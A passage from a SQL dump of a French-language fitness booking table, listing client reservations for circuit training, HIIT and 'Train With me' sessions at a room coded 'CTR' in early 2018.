(12441, 342, 'CTR', '2018-03-22', '18h45', '19h15', 'Circuit Training'),
(12440, 105, 'CTR', '2018-03-22', '18h45', '19h15', 'Circuit Training'),
(12439, 322, 'CTR', '2018-03-22', '18h45', '19h15', 'Circuit Training'),
(12438, 224, 'CTR', '2018-03-22', '12h45', '13h15', 'Circuit Training'),
(12437, 189, 'CTR', '2018-03-22', '12h45', '13h15', 'Circuit Training'),
(12436, 345, 'CTR', '2018-03-22', '12h45', '13h15', 'Circuit Training'),
(12434, 189, 'CTR', '2018-03-15', '12h45', '13h15', 'Circuit Training'),
(12435, 345, 'CTR', '2018-03-15', '12h45', '13h15', 'Circuit Training'),
(12426, 312, 'CTR', '2018-03-15', '12h45', '13h15', 'Circuit Training'),
(12432, 294, 'CTR', '2018-03-30', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12428, 140, 'CTR', '2018-03-15', '12h45', '13h15', 'Circuit Training'),
(12429, 294, 'CTR', '2018-03-21', '20h30', '21h00', 'Circuit training'),
(12430, 294, 'CTR', '2018-03-23', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12583, 132, 'CTR', '2018-04-09', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12421, 306, 'CTR', '2018-03-12', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12420, 306, 'CTR', '2018-03-12', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12419, 301, 'CTR', '2018-03-12', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12418, 301, 'CTR', '2018-03-12', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12417, 297, 'CTR', '2018-03-12', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12416, 297, 'CTR', '2018-03-12', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12415, 265, 'CTR', '2018-03-12', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12413, 312, 'CTR', '2018-03-12', '17h30', '18h00', 'Circuit Training'),
(12412, 56, 'CTR', '2018-03-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12411, 56, 'CTR', '2018-03-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12409, 205, 'CTR', '2018-03-16', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12408, 205, 'CTR', '2018-03-15', '18h45', '19h15', 'Circuit Training'),
(12407, 80, 'CTR', '2018-03-12', '17h30', '18h00', 'Circuit Training'),
(12405, 344, 'CTR', '2018-03-15', '12h45', '13h15', 'Circuit Training'),
(12406, 205, 'CTR', '2018-03-12', '17h30', '18h00', 'Circuit Training'),
(12403, 311, 'CTR', '2018-03-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12402, 261, 'CTR', '2018-03-16', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12401, 180, 'CTR', '2018-03-16', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12400, 3, 'CTR', '2018-03-16', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12399, 195, 'CTR', '2018-03-16', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12398, 353, 'CTR', '2018-03-16', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12397, 354, 'CTR', '2018-03-16', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12396, 230, 'CTR', '2018-03-16', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12395, 31, 'CTR', '2018-03-16', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12394, 48, 'CTR', '2018-03-16', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12393, 205, 'CTR', '2018-03-09', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12392, 195, 'CTR', '2018-03-09', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12390, 80, 'CTR', '2018-03-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12388, 342, 'CTR', '2018-03-15', '18h45', '19h15', 'Circuit Training'),
(12387, 322, 'CTR', '2018-03-15', '18h45', '19h15', 'Circuit Training'),
(12386, 105, 'CTR', '2018-03-15', '18h45', '19h15', 'Circuit Training'),
(12385, 261, 'CTR', '2018-03-09', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12371, 31, 'CTR', '2018-03-09', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12370, 323, 'CTR', '2018-03-07', '20h30', '21h00', 'Circuit training'),
(12369, 132, 'CTR', '2018-03-07', '20h30', '21h00', 'Circuit training'),
(12368, 348, 'CTR', '2018-03-07', '18h45', '19h15', 'Circuit training'),
(12367, 348, 'CTR', '2018-03-07', '18h45', '19h15', 'Circuit training'),
(12366, 310, 'CTR', '2018-03-07', '18h45', '19h15', 'Circuit training'),
(12365, 247, 'CTR', '2018-03-07', '18h45', '19h15', 'Circuit training'),
(12364, 31, 'CTR', '2018-03-07', '18h45', '19h15', 'Circuit training'),
(12363, 339, 'CTR', '2018-03-07', '18h45', '19h15', 'Circuit training'),
(12384, 3, 'CTR', '2018-03-09', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12361, 230, 'CTR', '2018-03-07', '18h45', '19h15', 'Circuit training'),
(12360, 296, 'CTR', '2018-03-07', '18h00', '18h30', 'Circuit Training'),
(12359, 311, 'CTR', '2018-03-07', '18h00', '18h30', 'Circuit Training'),
(12358, 231, 'CTR', '2018-03-07', '18h00', '18h30', 'Circuit Training'),
(12357, 349, 'CTR', '2018-03-07', '18h00', '18h30', 'Circuit Training'),
(12356, 195, 'CTR', '2018-03-07', '18h00', '18h30', 'Circuit Training'),
(12355, 346, 'CTR', '2018-03-07', '18h00', '18h30', 'Circuit Training'),
(12354, 350, 'CTR', '2018-03-07', '18h00', '18h30', 'Circuit Training'),
(12353, 352, 'CTR', '2018-03-07', '17h15', '18h00', 'Circuit Training'),
(12352, 205, 'CTR', '2018-03-07', '17h15', '18h00', 'Circuit Training'),
(12351, 177, 'CTR', '2018-03-07', '17h15', '18h00', 'Circuit Training'),
(12350, 80, 'CTR', '2018-03-07', '17h15', '18h00', 'Circuit Training'),
(12349, 140, 'CTR', '2018-03-07', '18h00', '18h30', 'Circuit Training'),
(12348, 343, 'CTR', '2018-03-07', '18h00', '18h30', 'Circuit Training'),
(12347, 279, 'CTR', '2018-03-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12346, 279, 'CTR', '2018-03-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12345, 48, 'CTR', '2018-03-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12344, 48, 'CTR', '2018-03-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12343, 260, 'CTR', '2018-03-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12342, 260, 'CTR', '2018-03-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12341, 132, 'CTR', '2018-03-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12340, 132, 'CTR', '2018-03-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12339, 249, 'CTR', '2018-03-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12338, 249, 'CTR', '2018-03-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12337, 349, 'CTR', '2018-03-12', '17h30', '18h00', 'Circuit Training'),
(12427, 304, 'CTR', '2018-03-12', '17h30', '18h00', 'Circuit Training'),
(12335, 350, 'CTR', '2018-03-12', '17h30', '18h00', 'Circuit Training'),
(12433, 224, 'CTR', '2018-03-15', '12h45', '13h15', 'Circuit Training'),
(12334, 80, 'CTR', '2018-03-12', '17h30', '18h00', 'Circuit Training'),
(12414, 265, 'CTR', '2018-03-12', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12332, 337, 'CTR', '2018-03-12', '17h30', '18h00', 'Circuit Training'),
(12329, 260, 'CTR', '2018-03-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12330, 48, 'CTR', '2018-03-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12331, 48, 'CTR', '2018-03-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12328, 260, 'CTR', '2018-03-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12327, 132, 'CTR', '2018-03-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12326, 132, 'CTR', '2018-03-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12325, 350, 'CTR', '2018-03-05', '17h30', '18h00', 'Circuit Training'),
(12324, 80, 'CTR', '2018-03-05', '17h30', '18h00', 'Circuit Training'),
(12323, 231, 'CTR', '2018-03-05', '17h30', '18h00', 'Circuit Training'),
(12322, 337, 'CTR', '2018-03-05', '17h30', '18h00', 'Circuit Training'),
(12321, 48, 'CTR', '2018-03-09', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12320, 48, 'CTR', '2018-03-07', '18h45', '19h15', 'Circuit training'),
(12319, 249, 'CTR', '2018-03-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12318, 249, 'CTR', '2018-03-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12317, 338, 'CTR', '2018-03-09', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12316, 338, 'CTR', '2018-03-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12315, 338, 'CTR', '2018-03-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12314, 279, 'CTR', '2018-03-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12313, 279, 'CTR', '2018-03-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12312, 255, 'CTR', '2018-03-19', '17h30', '18h00', 'Circuit Training'),
(12311, 324, 'CTR', '2018-03-05', '17h30', '18h00', 'Circuit Training'),
(12309, 325, 'CTR', '2018-03-08', '18h45', '19h15', 'Circuit Training'),
(12298, 230, 'CTR', '2018-02-28', '18h00', '18h30', 'Circuit Training'),
(12376, 326, 'CTR', '2018-03-08', '18h45', '19h15', 'Circuit Training'),
(12296, 165, 'CTR', '2018-02-28', '20h30', '21h00', 'Circuit training'),
(12380, 311, 'CTR', '2018-03-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12381, 224, 'CTR', '2018-03-08', '12h45', '13h15', 'Circuit Training'),
(12382, 210, 'CTR', '2018-03-09', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12383, 180, 'CTR', '2018-03-09', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12377, 342, 'CTR', '2018-03-08', '18h45', '19h15', 'Circuit Training'),
(12374, 105, 'CTR', '2018-03-08', '18h45', '19h15', 'Circuit Training'),
(12375, 322, 'CTR', '2018-03-08', '18h45', '19h15', 'Circuit Training'),
(12373, 189, 'CTR', '2018-03-08', '12h45', '13h15', 'Circuit Training'),
(12289, 231, 'CTR', '2018-02-28', '18h00', '18h30', 'Circuit Training'),
(12288, 311, 'CTR', '2018-02-28', '18h00', '18h30', 'Circuit Training'),
(12287, 177, 'CTR', '2018-02-28', '17h15', '18h00', 'Circuit Training'),
(12286, 346, 'CTR', '2018-02-28', '18h00', '18h30', 'Circuit Training'),
(12285, 205, 'CTR', '2018-02-28', '20h30', '21h00', 'Circuit training'),
(12284, 132, 'CTR', '2018-02-28', '20h30', '21h00', 'Circuit training'),
(12283, 90, 'CTR', '2018-02-28', '20h30', '21h00', 'Circuit training'),
(12282, 348, 'CTR', '2018-02-28', '18h45', '19h15', 'Circuit training'),
(12281, 348, 'CTR', '2018-02-28', '18h45', '19h15', 'Circuit training'),
(12280, 339, 'CTR', '2018-02-28', '18h45', '19h15', 'Circuit training'),
(12279, 318, 'CTR', '2018-02-28', '18h45', '19h15', 'Circuit training'),
(12278, 31, 'CTR', '2018-02-28', '18h45', '19h15', 'Circuit training'),
(12277, 48, 'CTR', '2018-02-28', '18h45', '19h15', 'Circuit training'),
(11560, 195, 'CTR', '2017-12-13', '18h45', '19h15', 'Circuit training'),
(11561, 90, 'CTR', '2017-12-13', '20h30', '21h00', 'Circuit training'),
(12276, 310, 'CTR', '2018-02-28', '18h45', '19h15', 'Circuit training'),
(12275, 247, 'CTR', '2018-02-28', '18h45', '19h15', 'Circuit training'),
(12274, 173, 'CTR', '2018-02-28', '18h45', '19h15', 'Circuit training'),
(12273, 343, 'CTR', '2018-02-28', '18h00', '18h30', 'Circuit Training'),
(12272, 140, 'CTR', '2018-02-28', '18h00', '18h30', 'Circuit Training'),
(12299, 210, 'CTR', '2018-02-28', '20h30', '21h00', 'Circuit training'),
(12259, 205, 'CTR', '2018-02-22', '18h45', '19h15', 'Circuit Training'),
(12303, 80, 'CTR', '2018-02-28', '17h15', '18h00', 'Circuit Training'),
(12301, 296, 'CTR', '2018-02-28', '18h00', '18h30', 'Circuit Training'),
(12410, 80, 'CTR', '2018-03-16', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12372, 329, 'CTR', '2018-03-09', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12266, 294, 'CTR', '2018-03-16', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12391, 230, 'CTR', '2018-03-09', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12262, 294, 'CTR', '2018-03-07', '20h30', '21h00', 'Circuit training'),
(12304, 344, 'CTR', '2018-03-09', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12257, 306, 'CTR', '2018-02-26', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12256, 301, 'CTR', '2018-02-26', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12254, 281, 'CTR', '2018-02-26', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12253, 306, 'CTR', '2018-02-26', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12255, 301, 'CTR', '2018-02-26', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12258, 281, 'CTR', '2018-02-26', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12250, 297, 'CTR', '2018-02-26', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)');
INSERT INTO `reservation_reservation` (`id`, `id_client`, `id_salle`, `date`, `heure_deb`, `heure_fin`, `type_seance`) VALUES
(12249, 297, 'CTR', '2018-02-26', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12248, 265, 'CTR', '2018-02-26', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12247, 265, 'CTR', '2018-02-26', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12246, 307, 'CTR', '2018-02-26', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12245, 307, 'CTR', '2018-02-26', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12244, 56, 'CTR', '2018-02-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12243, 56, 'CTR', '2018-02-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12242, 260, 'CTR', '2018-02-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12241, 260, 'CTR', '2018-02-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12268, 337, 'CTR', '2018-02-26', '17h30', '18h00', 'Circuit Training'),
(12269, 323, 'CTR', '2018-02-28', '20h30', '21h00', 'Circuit training'),
(12302, 331, 'CTR', '2018-02-28', '18h00', '18h30', 'Circuit Training'),
(12238, 279, 'CTR', '2018-02-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12237, 279, 'CTR', '2018-02-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12236, 132, 'CTR', '2018-02-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12235, 132, 'CTR', '2018-02-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12234, 48, 'CTR', '2018-02-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12233, 48, 'CTR', '2018-02-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12264, 138, 'CTR', '2018-03-05', '17h30', '18h00', 'Circuit Training'),
(12231, 231, 'CTR', '2018-02-26', '17h30', '18h00', 'Circuit Training'),
(12230, 255, 'CTR', '2018-02-26', '17h30', '18h00', 'Circuit Training'),
(12229, 92, 'CTR', '2018-02-26', '17h30', '18h00', 'Circuit Training'),
(12228, 304, 'CTR', '2018-02-26', '17h30', '18h00', 'Circuit Training'),
(12227, 80, 'CTR', '2018-02-26', '17h30', '18h00', 'Circuit Training'),
(12226, 350, 'CTR', '2018-02-26', '17h30', '18h00', 'Circuit Training'),
(12225, 349, 'CTR', '2018-02-26', '17h30', '18h00', 'Circuit Training'),
(12389, 80, 'CTR', '2018-03-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12223, 48, 'CTR', '2018-02-23', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12222, 189, 'CTR', '2018-02-22', '12h45', '13h15', 'Circuit Training'),
(12219, 294, 'CTR', '2018-02-23', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12215, 195, 'CTR', '2018-02-21', '18h00', '18h30', 'Circuit Training'),
(12214, 80, 'CTR', '2018-02-19', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12213, 80, 'CTR', '2018-02-19', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12212, 56, 'CTR', '2018-02-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12211, 56, 'CTR', '2018-02-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12307, 138, 'CTR', '2018-03-07', '17h15', '18h00', 'Circuit Training'),
(12308, 344, 'CTR', '2018-03-07', '20h30', '21h00', 'Circuit training'),
(12208, 341, 'CTR', '2018-02-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12207, 341, 'CTR', '2018-02-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12206, 348, 'CTR', '2018-02-21', '18h45', '19h15', 'Circuit training'),
(12205, 348, 'CTR', '2018-02-21', '18h45', '19h15', 'Circuit training'),
(12204, 31, 'CTR', '2018-02-21', '18h45', '19h15', 'Circuit training'),
(12203, 48, 'CTR', '2018-02-21', '18h45', '19h15', 'Circuit training'),
(12202, 318, 'CTR', '2018-02-21', '18h45', '19h15', 'Circuit training'),
(12201, 173, 'CTR', '2018-02-21', '18h45', '19h15', 'Circuit training'),
(12200, 310, 'CTR', '2018-02-21', '18h45', '19h15', 'Circuit training'),
(12199, 247, 'CTR', '2018-02-21', '18h45', '19h15', 'Circuit training'),
(12198, 339, 'CTR', '2018-02-21', '18h45', '19h15', 'Circuit training'),
(12221, 345, 'CTR', '2018-02-22', '12h45', '13h15', 'Circuit Training'),
(12220, 344, 'CTR', '2018-02-28', '20h30', '21h00', 'Circuit training'),
(12185, 48, 'CTR', '2018-02-16', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12153, 297, 'CTR', '2018-02-19', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12154, 297, 'CTR', '2018-02-19', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12155, 281, 'CTR', '2018-02-19', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12184, 326, 'CTR', '2018-02-22', '18h45', '19h15', 'Circuit Training'),
(12183, 105, 'CTR', '2018-02-22', '18h45', '19h15', 'Circuit Training'),
(12182, 325, 'CTR', '2018-02-22', '18h45', '19h15', 'Circuit Training'),
(12181, 322, 'CTR', '2018-02-22', '18h45', '19h15', 'Circuit Training'),
(12160, 306, 'CTR', '2018-02-19', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12161, 180, 'CTR', '2018-02-14', '17h15', '18h00', 'Circuit Training'),
(12162, 311, 'CTR', '2018-02-14', '18h00', '18h30', 'Circuit Training'),
(12163, 180, 'CTR', '2018-02-16', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12164, 3, 'CTR', '2018-02-16', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12180, 342, 'CTR', '2018-02-22', '18h45', '19h15', 'Circuit Training'),
(12179, 279, 'CTR', '2018-02-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12178, 279, 'CTR', '2018-02-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12177, 322, 'CTR', '2018-02-15', '18h45', '19h15', 'Circuit Training'),
(12175, 340, 'CTR', '2018-02-15', '18h45', '19h15', 'Circuit Training'),
(12174, 342, 'CTR', '2018-02-15', '18h45', '19h15', 'Circuit Training'),
(12172, 345, 'CTR', '2018-02-15', '12h45', '13h15', 'Circuit Training'),
(12171, 324, 'CTR', '2018-02-15', '12h45', '13h15', 'Circuit Training'),
(12170, 189, 'CTR', '2018-02-15', '12h45', '13h15', 'Circuit Training'),
(12173, 325, 'CTR', '2018-02-15', '18h45', '19h15', 'Circuit Training'),
(12168, 210, 'CTR', '2018-02-16', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12166, 230, 'CTR', '2018-02-16', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12165, 261, 'CTR', '2018-02-16', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12159, 306, 'CTR', '2018-02-19', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12158, 301, 'CTR', '2018-02-19', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12157, 301, 'CTR', '2018-02-19', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12156, 281, 'CTR', '2018-02-19', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12152, 265, 'CTR', '2018-02-19', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12151, 265, 'CTR', '2018-02-19', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12150, 307, 'CTR', '2018-02-19', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12149, 307, 'CTR', '2018-02-19', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12148, 48, 'CTR', '2018-02-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12147, 48, 'CTR', '2018-02-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12146, 195, 'CTR', '2018-02-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12145, 195, 'CTR', '2018-02-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12144, 132, 'CTR', '2018-02-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12143, 132, 'CTR', '2018-02-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12187, 132, 'CTR', '2018-02-21', '20h30', '21h00', 'Circuit training'),
(12188, 90, 'CTR', '2018-02-21', '20h30', '21h00', 'Circuit training'),
(12189, 205, 'CTR', '2018-02-21', '20h30', '21h00', 'Circuit training'),
(12218, 280, 'CTR', '2018-02-21', '20h30', '21h00', 'Circuit training'),
(12191, 92, 'CTR', '2018-02-21', '17h15', '18h00', 'Circuit Training'),
(12192, 311, 'CTR', '2018-02-21', '18h00', '18h30', 'Circuit Training'),
(12193, 177, 'CTR', '2018-02-21', '17h15', '18h00', 'Circuit Training'),
(12194, 350, 'CTR', '2018-02-21', '18h00', '18h30', 'Circuit Training'),
(12195, 349, 'CTR', '2018-02-21', '18h00', '18h30', 'Circuit Training'),
(12136, 249, 'CTR', '2018-02-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12135, 249, 'CTR', '2018-02-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12186, 350, 'CTR', '2018-02-19', '17h30', '18h00', 'Circuit Training'),
(12132, 80, 'CTR', '2018-02-19', '17h30', '18h00', 'Circuit Training'),
(12131, 349, 'CTR', '2018-02-19', '17h30', '18h00', 'Circuit Training'),
(12130, 138, 'CTR', '2018-02-19', '17h30', '18h00', 'Circuit Training'),
(12209, 195, 'CTR', '2018-02-28', '18h45', '19h15', 'Circuit training'),
(12121, 195, 'CTR', '2018-02-16', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12120, 195, 'CTR', '2018-02-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12119, 80, 'CTR', '2018-02-12', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12124, 294, 'CTR', '2018-02-21', '20h30', '21h00', 'Circuit training'),
(12125, 326, 'CTR', '2018-02-15', '18h45', '19h15', 'Circuit Training'),
(12126, 105, 'CTR', '2018-02-15', '18h45', '19h15', 'Circuit Training'),
(12116, 80, 'CTR', '2018-02-12', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12115, 307, 'CTR', '2018-02-12', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12114, 307, 'CTR', '2018-02-12', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12113, 265, 'CTR', '2018-02-12', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12112, 265, 'CTR', '2018-02-12', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12111, 297, 'CTR', '2018-02-12', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12110, 297, 'CTR', '2018-02-12', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12109, 281, 'CTR', '2018-02-12', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12129, 304, 'CTR', '2018-02-19', '17h30', '18h00', 'Circuit Training'),
(12108, 281, 'CTR', '2018-02-12', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12127, 337, 'CTR', '2018-02-19', '17h30', '18h00', 'Circuit Training'),
(12128, 231, 'CTR', '2018-02-19', '17h30', '18h00', 'Circuit Training'),
(12105, 301, 'CTR', '2018-02-12', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12104, 301, 'CTR', '2018-02-12', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12103, 132, 'CTR', '2018-02-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12102, 132, 'CTR', '2018-02-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12101, 334, 'CTR', '2018-02-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12100, 334, 'CTR', '2018-02-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12099, 260, 'CTR', '2018-02-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12098, 260, 'CTR', '2018-02-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12097, 249, 'CTR', '2018-02-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12096, 249, 'CTR', '2018-02-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12095, 48, 'CTR', '2018-02-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12094, 48, 'CTR', '2018-02-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12093, 92, 'CTR', '2018-02-19', '17h30', '18h00', 'Circuit Training'),
(12092, 205, 'CTR', '2018-02-12', '17h30', '18h00', 'Circuit Training'),
(12091, 231, 'CTR', '2018-02-12', '17h30', '18h00', 'Circuit Training'),
(12090, 138, 'CTR', '2018-02-12', '17h30', '18h00', 'Circuit Training'),
(12089, 337, 'CTR', '2018-02-12', '17h30', '18h00', 'Circuit Training'),
(12088, 80, 'CTR', '2018-02-12', '17h30', '18h00', 'Circuit Training'),
(12087, 80, 'CTR', '2018-02-12', '17h30', '18h00', 'Circuit Training'),
(12086, 349, 'CTR', '2018-02-12', '17h30', '18h00', 'Circuit Training'),
(12085, 312, 'CTR', '2018-02-12', '17h30', '18h00', 'Circuit Training'),
(12083, 80, 'CTR', '2018-02-08', '18h45', '19h15', 'Circuit Training'),
(12082, 312, 'CTR', '2018-02-08', '18h45', '19h15', 'Circuit Training'),
(12306, 255, 'CTR', '2018-03-05', '17h30', '18h00', 'Circuit Training'),
(12080, 326, 'CTR', '2018-02-08', '18h45', '19h15', 'Circuit Training'),
(12079, 304, 'CTR', '2018-02-12', '17h30', '18h00', 'Circuit Training'),
(12078, 312, 'CTR', '2018-02-15', '12h45', '13h15', 'Circuit Training'),
(12077, 90, 'CTR', '2018-02-14', '20h30', '21h00', 'Circuit training'),
(12076, 132, 'CTR', '2018-02-14', '20h30', '21h00', 'Circuit training'),
(12075, 173, 'CTR', '2018-02-14', '18h45', '19h15', 'Circuit training'),
(12216, 138, 'CTR', '2018-02-21', '20h30', '21h00', 'Circuit training'),
(12073, 31, 'CTR', '2018-02-14', '18h45', '19h15', 'Circuit training'),
(12072, 48, 'CTR', '2018-02-14', '18h45', '19h15', 'Circuit training'),
(12071, 348, 'CTR', '2018-02-14', '18h45', '19h15', 'Circuit training'),
(12070, 348, 'CTR', '2018-02-14', '18h45', '19h15', 'Circuit training'),
(12069, 230, 'CTR', '2018-02-14', '18h45', '19h15', 'Circuit training'),
(12068, 339, 'CTR', '2018-02-14', '18h45', '19h15', 'Circuit training'),
(12067, 310, 'CTR', '2018-02-14', '18h45', '19h15', 'Circuit training'),
